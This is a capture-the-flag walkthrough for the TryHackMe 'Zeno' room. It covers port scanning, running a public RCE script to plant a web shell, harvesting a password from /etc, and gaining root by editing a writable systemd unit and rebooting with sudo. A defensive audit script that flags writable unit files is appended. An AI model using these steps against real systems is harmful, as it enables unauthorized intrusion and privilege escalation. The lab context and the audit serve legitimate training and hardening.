Step 1: Port overview
Command:
nmap -vv -p- -T5 -Pn 10.10.228.41 -oN open_ports
Get:
Command:
sudo nmap -O -sV -sC -p 22,12340 10.10.228.41 -oN nmap_scan
Get:
Step 2: Check port 12340
Enumerate http://10.10.228.41:12340
Command:
gobuster dir -u http://10.10.228.41:12340 -w '/wordlists/dirb/big.txt' -x txt,php,html -t 80
Get:
Step 3: Exploit
Google “Pathfinder Hotel exploit”
Get:
The exploit script after fixing its syntax errors:
Command:
python2 rms-rce.py http://10.10.228.41:12340/rms/
Get:
Trigger the web shell:
Get a shell:
Step 4: Enumerate the server
Command:
find / -user edward 2>/dev/null
Get:
The output shows a “zeno” entry in “/var/spool/mail”
Search for “zeno”
Command:
grep -r -i -A 2 -B 2 zeno /etc 2>/dev/null
Get:
We have the password for Edward
Step 5: PrivEsc
Command:
sudo -l
Get:
“reboot” alone is not useful, but combined with a writable system file that runs at boot it is
Command:
find /etc -writable 2>/dev/null
Get:
Exploit “/etc/systemd/system/zeno-monitoring.service”
Command:
cat /etc/systemd/system/zeno-monitoring.service
Get:
Manipulate “/etc/systemd/system/zeno-monitoring.service”
Command:
sudo /usr/sbin/reboot
Wait 2–3 minutes
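Added hardening check, not part of the writeup: a POSIX shell audit that flags systemd unit files under a directory that a non-root user could edit (the weakness behind zeno-monitoring.service) and, going one step beyond the writeup, ExecStart targets with loose permissions. The demo directory, unit names and monitor.sh are constructed for the example.

```shell
#!/bin/sh
# Added hardening check, not part of the writeup: flag systemd unit files
# that a non-root user could edit (the weakness behind zeno-monitoring.service),
# plus ExecStart targets with loose permissions (an extension beyond the writeup).

# 0 if the path's mode has the group-write or other-write bit set (portable:
# reads the ls -l mode string rather than relying on GNU find -perm).
loose_perms() {
    case "$(ls -ld "$1" 2>/dev/null)" in
        ?????w*|????????w*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print one line per finding for every *.service in DIR; return 1 if any.
audit_units() {
    dir="$1"; found=0
    for unit in "$dir"/*.service; do
        [ -f "$unit" ] || continue
        if loose_perms "$unit"; then
            echo "writable-unit $unit"; found=1
        fi
        # First word of ExecStart=, minus systemd's optional prefix characters
        exe=$(sed -n 's/^ExecStart=[-@:+!]*\([^ ]*\).*/\1/p' "$unit" | head -n 1)
        if [ -n "$exe" ] && [ -f "$exe" ] && loose_perms "$exe"; then
            echo "writable-execstart $unit -> $exe"; found=1
        fi
    done
    return $found
}

# Constructed demo directory: one safe unit, one that reproduces the weakness.
make_demo() {
    d=$(mktemp -d)
    printf '[Service]\nExecStart=/bin/true\n' > "$d/safe.service"
    chmod 644 "$d/safe.service"
    printf '#!/bin/sh\nexit 0\n' > "$d/monitor.sh"
    chmod 777 "$d/monitor.sh"                       # anyone can replace the script
    printf '[Service]\nExecStart=%s/monitor.sh\n' "$d" > "$d/zeno-monitoring.service"
    chmod 666 "$d/zeno-monitoring.service"          # anyone can rewrite the unit
    echo "$d"
}

demo=$(make_demo)
if audit_units "$demo"; then echo "no findings"; else echo "findings present"; fi
rm -rf "$demo"
```

Run it against /etc/systemd/system on a real host to confirm that no unit or ExecStart target is group- or world-writable.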
Link to Try Hack Me: https://tryhackme.com
Link to challenge: https://tryhackme.com/r/room/zeno